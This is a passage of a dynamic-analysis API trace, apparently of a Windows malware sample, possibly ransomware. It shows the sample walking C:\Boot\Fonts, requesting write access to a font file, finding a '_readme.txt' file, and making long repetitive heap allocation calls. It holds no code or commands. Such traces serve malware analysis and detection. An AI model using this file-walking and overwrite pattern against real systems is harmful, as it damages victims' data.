ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.124] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0097.124] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.124] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.125] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned=".txt" [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.125] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.125] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.125] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.125] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) 